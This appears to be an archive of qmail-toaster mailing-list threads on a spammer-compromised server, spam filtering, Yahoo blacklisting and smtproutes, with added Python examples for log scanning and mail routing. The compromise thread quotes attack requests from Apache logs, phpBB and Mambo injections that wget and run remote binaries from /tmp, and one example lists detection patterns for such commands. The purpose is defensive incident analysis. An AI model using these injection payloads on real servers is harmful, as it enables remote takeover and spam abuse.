Re: [toaster] Toaster compromised? Or system?
Take a look through your Apache logs to see the URL call they used to exploit the /tmp directory. Try searching for strings like 'wget' or 'ftp' within your Apache access logs. Chances are you will uncover the culprit script.

Judging by the permissions on the files in your /tmp directory they most likely did not get root on the box.

In the future I would recommend chmod'ing the following executables to 700:

wget
ftp
lynx

If you can get away with chmod'ing perl to 700 that will help things also. Due to the permission settings on these files, they had to have executed the script with:

perl filename.pl

Check out mod_security for Apache as well.

Peter

On 2/10/06, David [EMAIL PROTECTED] wrote:
> Rick Macdougall wrote:
> > David wrote:
> > > *warning long email*
> > >
> > > Hi all,
> > >
> > > We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how/how to prevent this...
> > >
> > > apache 32499 32498 0 Feb08 ? S 0:00 \_ perl /tmp/dc.txt 67.159.2
> > > apache 32503 32499 0 Feb08 ? S 0:00 \_ /bin/bash
> >
> > Hi,
> >
> > I believe that is the xmlrpc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it. You can then use a tool like qmail-remove to clean out the queue.
> >
> > Regards,
> >
> > Rick
>
> Thanks Rick,
>
> I'm running php 4.3.10 and I can't find any information about a xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking.
>
> Thanks,
>
> David.
Re: [toaster] Toaster compromised? Or system?
I would personally setup mod_security as well. It should stop most of these types of attacks right away with default settings.

Peter

On 2/10/06, David [EMAIL PROTECTED] wrote:
> Bill Shupp wrote:
> > David wrote:
> > > Thanks Peter - reassuring to know that someone else thinks they probably didn't get root... I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however.
> > >
> > > I uncovered this in the apache logs:
> > >
> > > ./www.myvirtualhost.domain-access_log:86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] GET /store/phpbb2/viewtopic.php?t=2rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa%3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1 200 21138 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
> > >
> > > looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one. Closer to date is:
> > >
> > > ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters after protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://209.136.48.69/cmd.gif?cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1
> > >
> > > But it looks like that one failed. Oh well, time to update php and clean out a few old phpbb installs.
> > >
> > > Thanks all for your help.
> > >
> > > David
> >
> > A few things I always run into with PHP that are popular:
> >
> > 1) Make sure PHPBB is the latest version and not exploitable. I used to allow my clients to install it, but every few months, SOMEONE would install an old exploitable version. I've switched to using debian's PHPBB package, and just point clients to it so I don't have to keep track of it anymore. I just run security updates daily instead on all packages. Haven't been exploited since.
> >
> > 2) Keep register_globals off, and only turn it on as needed.
> >
> > 3) Make sure allow_url_fopen is set to OFF. This is a very popular one, and in my experience tends to attract DDoS attacks rather than a mail exploit. But costs you expensive bandwidth nonetheless.
> >
> > Regards,
> >
> > Bill
>
> Cheers Bill,
>
> register_globals always off, but now I will probably disable url file operations too. Perhaps just enable them on a per-site setting.
>
> David
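Grepping the raw access log for 'wget', as suggested above, misses requests where the command is percent-encoded (the lines David posted encode even the word "echo"). The following is an added example, not code from the thread or from any of the projects it mentions: it parses combined-log-format lines, percent-decodes the request a bounded number of times (so double-encoded %2527 is caught), and reports only command-shaped patterns, so a forum search for the word "wget" does not trip it. The log lines, IP addresses (documentation ranges) and host names are constructed; the indicator list is my own choice and covers the patterns visible in the thread (cd /tmp, wget/ftp/lynx/perl, chmod, passthru, and a parameter set to an http:// URL, which is what allow_url_fopen=off is meant to stop).

```python
import re
from urllib.parse import unquote

# Constructed sample access_log lines (combined log format). They mirror the
# shape of the requests in the thread but point at documentation addresses.
SAMPLE_LOG = r"""
10.0.0.5 - - [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2&rush=%63%64%20/tmp;wget%20example.invalid/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh HTTP/1.1" 200 21138 "-" "Mozilla/4.0"
10.0.0.6 - - [15/Jan/2006:22:51:53 +0930] "GET /php/mambo/index2.php?option=com_content&mosConfig_absolute_path=http://203.0.113.9/cmd.gif?cmd=cd%20/tmp;wget%20203.0.113.9/micu;chmod%20744%20micu HTTP/1.1" 404 512 "-" "Mozilla/4.0"
10.0.0.7 - - [15/Jan/2006:23:01:10 +0930] "GET /store/phpbb2/viewtopic.php?t=42&highlight=wget HTTP/1.1" 200 8820 "-" "Mozilla/4.0"
10.0.0.8 - - [15/Jan/2006:23:05:44 +0930] "GET /index.php?page=about HTTP/1.1" 200 3120 "-" "Mozilla/4.0"
"""

# Combined-log-format request line: client IP, timestamp, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

# Indicators checked against the DECODED request, in report order. Each one
# requires command shape (a tool followed by an argument, chmod followed by a
# mode) rather than the bare word, to keep ordinary searches out of the report.
INDICATORS = [
    ("remote-include", re.compile(r'=(?:https?|ftp)://', re.I)),   # parameter set to a URL
    ("cd-tmp",         re.compile(r'\bcd\s+/tmp\b', re.I)),
    ("fetch-or-exec",  re.compile(r'(?:^|[;|&\s])(?:wget|ftp|lynx|curl|perl)\s+\S', re.I)),
    ("chmod",          re.compile(r'\bchmod\s+[0-7]{3,4}\b', re.I)),
    ("passthru",       re.compile(r'passthru\s*\(', re.I)),
]


def url_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly but boundedly, so %2527 -> %27 -> ' is seen."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(path: str) -> list:
    """Names of the indicators present in the decoded request path (may be empty)."""
    decoded = url_decode(path)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def scan_access_log(text: str) -> list:
    """One dict per request that matched at least one indicator, in log order."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line
        ip, ts, method, path, status = m.groups()
        found = classify(path)
        if found:
            hits.append({"ip": ip, "time": ts, "method": method,
                         "status": int(status), "decoded": url_decode(path),
                         "indicators": found})
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(f'{h["ip"]} {h["status"]} {h["indicators"]}')
        print("   ", h["decoded"])
```

Run it against a real log with `scan_access_log(open(path).read())`; the decoded request is kept in each hit so the script that was fetched can be read straight off the report. A 200 status on a hit is the case worth chasing first: the request reached the script and the server answered.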
Re: [toaster] Qmail - how to backup all mails?
Hi KS,

This should work... From your shell prompt:

vpopmailctl stop
qmailctl stop
mkdir /var/src/qmail_backup
cp /home/vpopmail/domains/ /var/src/qmail_backup/ -R

Should grab all of the e-mails, as they are stored in: /home/vpopmail/domains/

Good luck!

Peter

On Tue, 07 Dec 2004 18:22:33 +0100, Krzysztof Syguda [EMAIL PROTECTED] wrote:
> Does somebody know how to backup all incoming and outgoing mail for domain (or toaster server) or CC of all incoming and outgoing mail to one address?
>
> KS
>
> Krzysztof Syguda
> tel. +48 607223304
> e-mail: [EMAIL PROTECTED]
>
> Thought for the day: The only thing that hurts more than paying income tax is not having to pay income tax.
Re: [toaster] Yahoo Domain Keys
Boris,

I did notice that, and I was contemplating not even posting the link on this list, as I for one absolutely hate how Yahoo insists on running their abuse and postmaster departments. However, as an ISP we need to deal with the (terrible) way Yahoo is dealing with tagging messages as SPAM.

Thanks,

Peter

On Thu, 18 Nov 2004 11:13:08 +0200, Boris Pavlov [EMAIL PROTECTED] wrote:
> Peter Maag wrote:
> > To Bill and the List,
> >
> > I wanted to bring everyone's attention to Yahoo's new version of stopping SPAM, domainkeys (http://antispam.yahoo.com/domainkeys). Basically it is their version of
>
> maybe this is (a part of) the reason
> http://domainkeys.sourceforge.net/license/patentlicense1-0.html
> any lawyer to check it out? at first glance it is just some protective measure against a patent infringement claim against any Implementation (3.1).
>
> > SPF (why they don't just use SPF is beyond me), and there is a qmail patch available: http://qmail.org/qmail-1.03-dk-0.53.patch
> >
> > Will this patch work with the toaster, or do we need to roll something else?
> >
> > Thanks!
> >
> > Peter
Re: [toaster] simscan
spud,

Thanks for looking into this a little more. It sounds like an awesome replacement to qmailscanner, and will certainly limit the queue filling up from bounces to invalid domains, etc.

Peter

a.h.s. boy (lists) wrote:
> On Sep 29, 2004, at 7:24 PM, Bill Shupp wrote:
> > a.h.s. boy (lists) wrote:
> > > So it sounds like you can just set the simscan rejection level very high, like 30, and it will only reject the mail over that threshold. If SpamAssassin's own threshold setting can be different (like 7), then SA will still mark the mail as Spam, and simscan will allow it to pass through.
> >
> > That's how I read it. I plan to test simscan soon. Right now it's failing, and strace is not helping, but I have not tested it much yet. I'll report back when I have.
>
> I got a response from Ken Jones. Sounds like we have it right:
>
> > With spamassassin enabled --enable-spam the email is passed through spamassassin with all its associated headers. If the email is marked as spam then it is rejected. All other emails pass through with the spamassassin headers intact.
> >
> > With --enable-spam-hits=number then only email above this hit count is rejected. All other email is passed through including email marked as spam. The idea was to only reject really bad spam and let the user filter the rest.
>
> Cheers,
> spud.
>
> ---
> a.h.s. boy
> spud(at)nothingness.org
> as yes is to if, love is to yes
> http://www.nothingness.org/
> ---
Re: [toaster] simscan
Bill and Tom,

Thanks for the replies. I don't think I was very clear in my first message. I would like ClamAV to scan and block at the SMTP level, but have SpamAssassin run as it normally does with QmailScanner, after the message has already been accepted. From briefly looking over simscan, it looks like it does support SpamAssassin based filtering, however it will only work at the SMTP level and will block messages that reach the score threshold.

Am I stuck with using simscan and qmailscanner?

Thanks,

Peter

Bill Shupp wrote:
> Peter Maag wrote:
> > Jason,
> >
> > It looks good to us, however we don't want to reject based on SpamAssassin results. Right now we use qmailscanner, which does slow things down quite a bit, and a C alternative that does an SMTP deny based on ClamAV, and not SpamAssassin, would be preferred. Anyone know of a solution that would work?
> >
> > Thanks,
> >
> > Peter
>
> Peter,
>
> This will do exactly that. SpamAssassin blocking is optional. There's also qscanq: www.qscanq.org. But it's a bit more complicated to get working correctly, and I've had problems with it on FreeBSD. Also, qscanq does NOT do attachment blocking.
>
> If you require SpamAssassin scanning at the smtp level, you should look into qmail-spamc, which is a simple C program to call first spamc, then qmail-queue. You could manually add this to your chain AFTER simscan, either editing the qmail-queue call from simscan manually, or using symlinks.
>
> Regards,
>
> Bill
Re: [toaster] stunnel and redhat enterprise 3.0
Jason,

We have had the same problem with a Redhat 9 machine of ours. We have just kept stunnel at 3.x, and would also like to know how to get things operational with stunnel 4.x.

Peter

Jason 'XenoPhage' Frisvold wrote:
> Hi all,
>
> I just determined that pop3ds is not working at all here... Apparently the script calls several parameters for stunnel that are no longer available in stunnel? I have the stock pop3ds run file from the toaster which assumes stunnel 3.x ... I'm running stunnel 4.x ... Anyone know how to set this up for stunnel 4.x ??
Re: [toaster] not sending
Noel,

Try doing a:

cat /var/log/qmail/smtpd/current

and

cat /var/log/qmail/current

These are the log files associated with most qmail deliveries and are usually quite helpful in letting you know exactly what is going on.

Hope this helps,

Peter

Noel Sanchez wrote:
> I setup a new toaster and don't know why I can't send emails from Outlook. When I do qmailctl I get the following:
>
> [EMAIL PROTECTED] root]# qmailctl stat
> /service/qmail-send: up (pid 1723) 762 seconds
> /service/qmail-send/log: up (pid 1725) 762 seconds
> /service/qmail-smtpd: up (pid 1719) 762 seconds
> /service/qmail-smtpd/log: up (pid 1731) 762 seconds
> messages in queue: 8130
> messages in queue but not yet preprocessed: 0
>
> Also, when I do a ps -aux I see many emails waiting to be sent but aren't being sent. Any ideas?
>
> qmailr 6029 0.0 0.3 4412 836 ? S 12:12 0:00 qmail-remote yam.com.tw [EMAIL PROTECTED]
> qmailr 6078 0.0 0.3 4472 840 ? S 12:12 0:00 qmail-remote mks.com.tw [EMAIL PROTECTED]
> qmailr 6188 0.0 0.3 4796 836 ? S 12:12 0:00 qmail-remote newcomm.net ohv0q.rbdq
> qmailr 6204 0.0 0.3 5028 840 ? S 12:12 0:00 qmail-remote ms10.hinet.net [EMAIL PROTECTED]
> qmailr 6217 0.0 0.3 4604 848 ? S 12:13 0:00 qmail-remote yam.com.tw [EMAIL PROTECTED]
> qmailr 6229 0.0 0.3 5184 840 ? S 12:13 0:00 qmail-remote yahoo.com.tw 6uimecdrk
> qmailr 6231 0.0 0.3 4212 844 ? S 12:13 0:00 qmail-remote yahoo.com.tw 6uimecdrk
> qmailr 6236 0.0 0.3 4040 836 ? S 12:13 0:00 qmail-remote tke.tsannkuen.com 6uim
> qmailr 6238 0.0 0.3 4772 840 ? S 12:13 0:00 qmail-remote hjinn.com.tw 6uimecdrk
Re: [toaster] not sending
Noel,

What are the IP's of the mail server? I would shut down the port 25 forward to see if that slows things down. Make sure you followed the toaster install instructions correctly, as you may have forgotten to stop the server functioning as an open relay.

Thanks,

Peter

Noel Sanchez wrote:
> I don't understand, I looked at those 2 log files and this is a portion of it. The messages in the queue keep increasing fast. It seems like this mail server is being used for spam? This is a new toaster on Fedora core2 behind a linux firewall with ports 80, 25, and 110 being forwarded to the mail server. Could it be a computer that's infected with something? The mail that is being sent is not coming from here, no one is sending out that stuff...
>
> @4000415b44b03aea448c tcpserver: status: 12/20
> @4000415b44b03aea6b9c tcpserver: pid 6893 from 192.168.2.1
> @4000415b44b03aea830c tcpserver: ok 6893 0:192.168.2.100:25 :192.168.2.1::27193
> @4000415b44b1003fc244 tcpserver: end 6879 status 0
> @4000415b44b1003ff124 tcpserver: status: 11/20
> @4000415b44b10f5f2864 tcpserver: status: 12/20
> @4000415b44b10f69cb0c tcpserver: pid 6896 from 192.168.2.1
> @4000415b44b10f6e0ce4 tcpserver: ok 6896 0:192.168.2.100:25 :192.168.2.1::27195
> @4000415b44b302a1b6b4 tcpserver: end 6893 status 0
> @4000415b44b302a1d9dc tcpserver: status: 11/20
> @4000415b44b3130ef1c4 tcpserver: status: 12/20
> @4000415b44b3130f18d4 tcpserver: pid 6907 from 192.168.2.1
> @4000415b44b3130f3044 tcpserver: ok 6907 0:192.168.2.100:25 :192.168.2.1::27196
> @4000415b44b31a093304 tcpserver: end 6896 status 0
> @4000415b44b31a09562c tcpserver: status: 11/20
> @4000415b44b52065d89c tcpserver: end 6907 status 0
> @4000415b44b52065ffac tcpserver: status: 10/20
> @4000415b44b5226e6a3c tcpserver: end 6876 status 0
> @4000415b44b5226e897c tcpserver: status: 9/20
> @4000415b44b52f3f6bbc tcpserver: status: 10/20
> @4000415b44b52f3f96b4 tcpserver: pid 6924 from 192.168.2.1
> @4000415b44b52f3fae24 tcpserver: ok 6924 0:192.168.2.100:25 :192.168.2.1::27197
> @4000415b44b52f3fc97c tcpserver: status: 11/20
> @4000415b44b52f3fdd04 tcpserver: pid 6925 from 192.168.2.1
> @4000415b44b52f3ff08c tcpserver: ok 6925 0:192.168.2.100:25 :192.168.2.1::27198
> @4000415b44b6352aec7c tcpserver: status: 12/20
> @4000415b44b6352b1774 tcpserver: pid 6930 from 192.168.2.1
> @4000415b44b6352b2ee4 tcpserver: ok 6930 0:192.168.2.100:25 :192.168.2.1::27199
> @4000415b44b71dbc5bac tcpserver: end 6925 status 0
> @4000415b44b71dbc86a4 tcpserver: status: 11/20
> @4000415b44b730521824 tcpserver: status: 12/20
> @4000415b44b73052431c tcpserver: pid 6943 from 192.168.2.1
> @4000415b44b730525a8c tcpserver: ok 6943 0:192.168.2.100:25 :192.168.2.1::27200
>
> and the other log file:
>
> @4000415b44ec0044affc info msg 349855: bytes 2556 from [EMAIL PROTECTED] qp 7251 uid 89
> @4000415b44ec0db0bce4 delivery : success: 168.95.5.5_accepted_message./Remote_host_said:_250_HAA26438_Message_accepted_for_delivery/
> @4000415b44ec0db0efac status: local 0/10 remote 19/20
> @4000415b44ec0db1071c end msg 347963
> @4000415b44ec0dbd76b4 starting delivery 1116: msg 346923 to remote [EMAIL PROTECTED]
> @4000415b44ec0dbd99dc status: local 0/10 remote 20/20
> @4000415b44ec0ebe21bc new msg 349862
> @4000415b44ec0ebe4cb4 info msg 349862: bytes 3728 from [EMAIL PROTECTED] qp 7253 uid 89
> @4000415b44ed10c8499c new msg 346929
> @4000415b44ed10c87494 info msg 346929: bytes 7234 from [EMAIL PROTECTED] qp 7258 uid 89
> @4000415b44ed391e853c delivery 1114: success: 168.95.5.36_accepted_message./Remote_host_said:_250_HAA27941_Message_accepted_for_delivery/
> @4000415b44ed391ebfd4 status: local 0/10 remote 19/20
> @4000415b44ed391ed744 starting delivery 1117: msg 346923 to remote [EMAIL PROTECTED]
> @4000415b44ed391ef29c status: local 0/10 remote 20/20
> @4000415b44ed391f0624 end msg 347956
> @4000415b44ed3af51614 new msg 349863
> @4000415b44ed3af5410c info msg 349863: bytes 7229 from [EMAIL PROTECTED] qp 7260 uid 89
> @4000415b44ee1363e7c4 delivery 1110: success: 168.95.5.23_accepted_message./Remote_host_said:_250_HAA23411_Message_accepted_for_delivery/
> @4000415b44ee13641a8c status: local 0/10 remote 19/20
> @4000415b44ee13642e14 starting delivery 1118: msg 346923 to remote [EMAIL PROTECTED]
> @4000415b44ee1364496c status: local 0/10 remote 20/20
> @4000415b44ee136460dc end msg 347955
> @4000415b44ee2258231c delivery 1106: success: 211.23.16.93_accepted_message./Remote_host_said:_250_mail_received,_ready_to_proceed./
> @4000415b44ee22585db4 status: local 0/10 remote 19/20
> @4000415b44ee22587524 starting delivery 1119: msg 346923 to remote [EMAIL PROTECTED]
> @4000415b44ee2258907c status: local 0/10 remote 20/20
>
> > Noel,
> >
> > Try doing a:
> >
> > cat /var/log/qmail/smtpd/current
> >
> > and
> >
> > cat /var/log/qmail/current
> >
> > These are the log files associated with most qmail deliveries and are usually quite helpful in
Re: [toaster] Hotmail is recieving mail in junk box
Saki,

Looks like you may have gotten a bad IP block from your provider. You can run a test on your IP by going to: http://www.dnsstuff.com . There is a box at the very top, middle column that says: Spam Database Lookup. Put your IP in there and run the test; it will show you which blacklists currently have you listed. Hopefully you aren't the one sending SPAM, and you can somehow convince them to unblacklist you.

Good luck,

Peter

saki wrote:
> Peter,
>
> Thank you for your reply. As with hotmail, this problem is arising when a user sends mail to gawab.com. Qmail replies:
>
> @4000414ebf192faaacc4 new msg 97866
> @4000414ebf192faac81c info msg 97866: bytes 907 from [EMAIL PROTECTED] qp 2470 uid 89
> @4000414ebf19306722dc starting delivery 13: msg 97866 to remote [EMAIL PROTECTED]
> @4000414ebf1930695d2c status: local 0/10 remote 1/20
> @4000414ebf2032f2b3a4 delivery 13: deferral: Connected_to_204.97.230.38_but_greeting_failed./Remote_host_said:_558_Your_network_address_is_blacklisted,_this_means_that_your_network_range_or_your_server_is_in_our_blacklist._If_you_think_you_were_added_by_mistake,[EMAIL PROTECTED],_please_make_sure_your_outgoing_server_is_smtp.gawab.com_(#5.7.1)/
> @4000414ebf2032f3348c status: local 0/10 remote 0/20
>
> So I think there is a certain clue between hotmail and gawab.com
>
> With best wishes
>
> Saki
>
> --- Peter Maag [EMAIL PROTECTED] wrote:
> > Saki,
> >
> > Yes, quite frustrating isn't it? As Bill mentioned we were having a similar problem with Yahoo! recently, and are less than impressed with their postmaster department. Yahoo! has a form buried deep in their site that they will send you to fill out if you are being blacklisted. Filled it out, and never got a response so we were finally forced to change the IPs of our SMTP servers. No good.
> >
> > The cause of the problem was the story I posted in the link that Bill provided. Our users had setup forwards from the domain we were hosting to their Yahoo! accounts. SPAM would come through, hit our servers, our servers would send it on its way, and our users would mark it as SPAM in their Yahoo! inbox. Yahoo! started noticing quite a few SPAM complaints because of this, and started to blacklist us. Not much you can do about that, except setup SPF and pray.
> >
> > I would URGE everyone here who has a fair amount of users to sign up with AOL's Postmaster department on their whitelist service. http://postmaster.aol.com , heck even give them a call and they will get everything setup for you! It is a pleasant departure from the bad rep AOL has always received.
> >
> > As for Hotmail, after looking through their website it appears as if they have a phone number dedicated to these types of problems: 1-650-964-7200 , which was found on the very very bottom of this page: http://www.hotmail.msn.com/cgi-bin/dasp/ua_info.asp?_lang=ENcountry=US
> >
> > Good luck!
> >
> > Peter
> >
> > Bill Shupp wrote:
> > > saki wrote:
> > > > --- saki [EMAIL PROTECTED] wrote:
> > > > > Hello all,
> > > > >
> > > > > I have installed qmail successfully according to BILL's guide. My server sends mail to yahoo and gmail successfully. But when I send a message qmail replies:
> > > > >
> > > > > [EMAIL PROTECTED] root]# tail -f /var/log/qmail/current
> > > > > @4000414d9f4612105614 new msg 97975
> > > > > @4000414d9f461210716c info msg 97975: bytes 231 from [EMAIL PROTECTED] qp 2370 uid 0
> > > > > @4000414d9f46125ca154 starting delivery 2: msg 97975 to remote [EMAIL PROTECTED]
> > > > > @4000414d9f46125cb8c4 status: local 0/10 remote 2/20
> > > > > @4000414d9f4f1e33e53c delivery 2: success: 65.54.190.7_accepted_message./Remote_host_said:_250__[EMAIL PROTECTED]_Queued_mail_for_delivery/
> > > > >
> > > > > and hotmail catches the mail in the junk box. Why is it going on? Could anyone help me?
> > >
> > > Check out this thread on a similar situation with Yahoo:
> > >
> > > http://mail-archive.com/[EMAIL PROTECTED]/msg01730.html
> > >
> > > Regards,
> > >
> > > Bill
Re: [toaster] cgi-bin
Nezinu,

You most likely have incorrect permissions set on the qmailadmin cgi file, or your Apache installation does not include support for cgi related programs. You will need to setup your cgi-bin as your ScriptAlias directory in your httpd.conf. Check http://www.apache.org for details on setting that directive up, and other CGI related problems.

Hope this helps,

Peter

Nezinu wrote:
> Hello.
>
> I read your instructions on how to make a mailserver and all did fine, only at the end of the document something went wrong. The problem is that when I open http://myhost.lv/cgi-bin/qmailadmin it asks me to save or open this file and does not open the page. Or trying to change some configs I simply get page not found.. Please help me..
Re: [toaster] Forwarding and SPAM Question
Eero,

Thanks for the tip. Are there any smarthosts that one can pay for to send mail to Yahoo? How does one selectively route e-mail out of qmail to alternate smtp servers?

Thanks,

Peter

Eero Volotinen wrote:
> Peter Maag wrote:
> > Bill and everyone else,
> >
> > I finally managed to get around Yahoo! filtering all e-mail from our SMTP IP address for the time being. Here is what I feel is happening, and really don't know if there is a solution:
>
> Use smarthost to relay mail to yahoo.
>
> --
> Eero
Re: [toaster] Yahoo Filtering and SMTP Routes
Bill,

About to do this switchover as you described. I looked through the QMail docs and can't tell if putting the smtproutes information in the server will stop mail from being delivered locally. For instance, the server that is being filtered by Yahoo is also the primary MX for the related domains. So for instance, say [EMAIL PROTECTED] receives an e-mail to this blocked SMTP server. Since the config has been placed in the smtproutes file wouldn't that message be forwarded on to my temporary external SMTP server?

I hope this is clear.

Thanks for the help,

Peter

Peter Maag wrote:
> Bill,
>
> It seems that they have not implemented SPF as of yet, because we have SPF records on all of our domains. I will try the solution you posted and will get back to you guys. It seems that Yahoo does not have ANY contact information with their postmaster department, as customer care has no clue what an SMTP server even is!
>
> Peter
>
> Bill Shupp wrote:
> > Peter Maag wrote:
> > > Hey All,
> > >
> > > Recently for some reason our customers have been complaining that mail forwarded or sent to their Yahoo accounts is being automatically deposited into their Bulk Mail folders. Contacting Yahoo! has been an uphill battle, and after numerous phone calls and e-mails to try and get to talk to someone with a clue we are giving up on them. Each of our SMTP servers has reverse DNS enabled and functioning correctly. We are on clean IPs, and none of the IPs are listed in any RBL or Blacklist.
> >
> > Have they implemented SPF?
> >
> > http://spf.pobox.com/faq.html#forwarding
> >
> > > I would like to leave our current SMTP servers intact and simply have them forward any mail they receive from our clients to yet another SMTP server that we operate on an entirely separate network. This would only be temporary until we get Yahoo to actually tell us what is going on. How would you accomplish this with qmail?
> >
> > put:
> >
> > :ipoftempsmtpserver
> >
> > in /var/qmail/control/smtproutes and hup qmail-send (replacing ipoftempsmtpserver with the actual IP). And make sure that the new smtp server has your current smtp server setup as RELAYCLIENT.
> >
> > Regards,
> >
> > Bill
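The question above (does a default smtproutes entry capture mail for domains the box is primary MX for?) comes down to the order of qmail's decisions: qmail-send hands a recipient to qmail-local when its domain is in `locals` or `virtualdomains`, and only remote recipients reach qmail-remote, which is the program that reads `smtproutes`. The following is an added example that models those two steps and the rcpthosts/RELAYCLIENT check on the relay side; it is not code from the thread or from qmail. The control files are constructed stand-ins (the domains and the relay address 203.0.113.10 are invented), and the virtualdomains handling is simplified to domain-level entries.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed stand-ins for /var/qmail/control/{locals,virtualdomains,smtproutes}.
# 203.0.113.10 plays the temporary external SMTP server from the thread.
LOCALS = ["localhost", "mailhost.example.net"]
VIRTUALDOMAINS = ["jimsdomain.com:jimsdomain", ".clients.example.net:clients"]
SMTPROUTES = """
# yahoo.com itself, and every host under aol.com, go via the relay
yahoo.com:203.0.113.10
.aol.com:203.0.113.10:2525
"""
DEFAULT_ROUTE = ":203.0.113.10"     # the ':ipoftempsmtpserver' form suggested above


@dataclass
class Route:
    kind: str                     # "local" or "remote"
    relay: Optional[str] = None   # None: qmail-remote does its own MX lookup
    port: int = 25


def lookup_keys(domain: str) -> List[str]:
    """Keys in qmail-remote's order: the domain, each '.parent' suffix, then '' (default).

    '.aol.com' therefore matches mx.aol.com but not aol.com itself."""
    keys = [domain]
    keys += [domain[i:] for i, ch in enumerate(domain) if ch == "."]
    keys.append("")
    return keys


def parse_smtproutes(text: str) -> Dict[str, Tuple[str, int]]:
    """domain -> (relay, port); a blank relay means 'use MX', a missing port means 25."""
    routes: Dict[str, Tuple[str, int]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        domain = parts[0]
        relay = parts[1] if len(parts) > 1 else ""
        port = int(parts[2]) if len(parts) > 2 and parts[2] else 25
        routes.setdefault(domain, (relay, port))   # first entry for a domain wins
    return routes


def is_local(domain: str) -> bool:
    """qmail-send keeps a recipient on this box if its domain is in locals or virtualdomains."""
    if domain in LOCALS:
        return True
    virtual = {entry.split(":", 1)[0] for entry in VIRTUALDOMAINS}
    return any(k in virtual for k in lookup_keys(domain))


def route_for(recipient: str, smtproutes_text: str) -> Route:
    """Where one recipient goes: local delivery, or remote via the matching smtproute."""
    domain = recipient.rsplit("@", 1)[1].lower()
    if is_local(domain):
        return Route("local")          # smtproutes is never consulted for local mail
    routes = parse_smtproutes(smtproutes_text)
    for key in lookup_keys(domain):
        if key in routes:
            relay, port = routes[key]
            return Route("remote", relay or None, port)
    return Route("remote")             # no route: ordinary MX delivery


def smtpd_accepts_rcpt(rcpthosts: List[str], relayclient: bool, recipient: str) -> bool:
    """qmail-smtpd on the relay: RCPT TO passes if RELAYCLIENT is set or the domain is in rcpthosts."""
    if relayclient:
        return True
    domain = recipient.rsplit("@", 1)[1].lower()
    return any(k in rcpthosts for k in lookup_keys(domain))


if __name__ == "__main__":
    for rcpt in ["jim@jimsdomain.com", "jim@yahoo.com", "x@mx.aol.com", "x@aol.com"]:
        print(rcpt, route_for(rcpt, SMTPROUTES))
    print("default route, local domain:", route_for("jim@jimsdomain.com", DEFAULT_ROUTE))
```

The two cases the thread turns on both fall out of `route_for`: a default route of `:203.0.113.10` leaves jimsdomain.com mail local because `is_local` short-circuits first, and the same relay will still answer 553 on RCPT TO unless the sending server is in its RELAYCLIENT rules or the destination domain is in its rcpthosts, which is the `smtpd_accepts_rcpt` check.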
[toaster] Forwarding and SPAM Question
Bill and everyone else,

I finally managed to get around Yahoo! filtering all e-mail from our SMTP IP address for the time being. Here is what I feel is happening, and really don't know if there is a solution:

Users with their own domain names use our e-mail services to forward messages to their Yahoo! and AOL accounts. Let's say Jim has the domain jimsdomain.com hosted with us. Jim decides that the Yahoo! account he has is the best thing since sliced bread, and figures that he should just have all e-mail from jimsdomain.com forwarded to his Yahoo! account. Not a problem! He logs into qmailadmin, sets up the forward and everything is merry!

Not so fast, Jim has had jimsdomain.com since the advent of DNS and his e-mail address has made its rounds on spam lists, etc, etc, so Jim gets quite a large amount of SPAM on a daily basis. This SPAM hits our SMTP server, gets forwarded to Yahoo and placed in Jim's INBOX just like it should. Jim takes one look at: [EMAIL PROTECTED]@x CHeaPEr oNLINE and instantly flags it as SPAM in his Yahoo account. He does this with every spam e-mail he receives, and pretty soon Yahoo! takes a look at the headers and realizes that our SMTP servers are responsible for sending quite a bit of SPAM to Jim. Our servers get blocked, and Jim instantly complains that his Aunt Janice's really important e-mail got moved to his Bulk folder and he missed some important correspondence.

Naturally, you can see the problem here. We are getting our IP ranges marked in providers' blacklists due to e-mail forwarding that we are doing on behalf of our customers. Is there any way around this besides calling each customer and educating them about what they are doing?

AOL has a great program with their SPF implementation, feedback loop, and whitelisting. I never thought I would say this, but AOL's postmaster department has a great website, and even greater postmaster customer service reps. Yahoo's is a nightmare and I have a feeling the people that can unblock an IP range sit locked away somewhere with no lines to the outside. As a provider this is extremely frustrating, as we constantly have to tread lightly with Yahoo!

Any ideas/suggestions are greatly appreciated.

Peter
Re: [toaster] Yahoo Filtering and SMTP Routes
Bill,

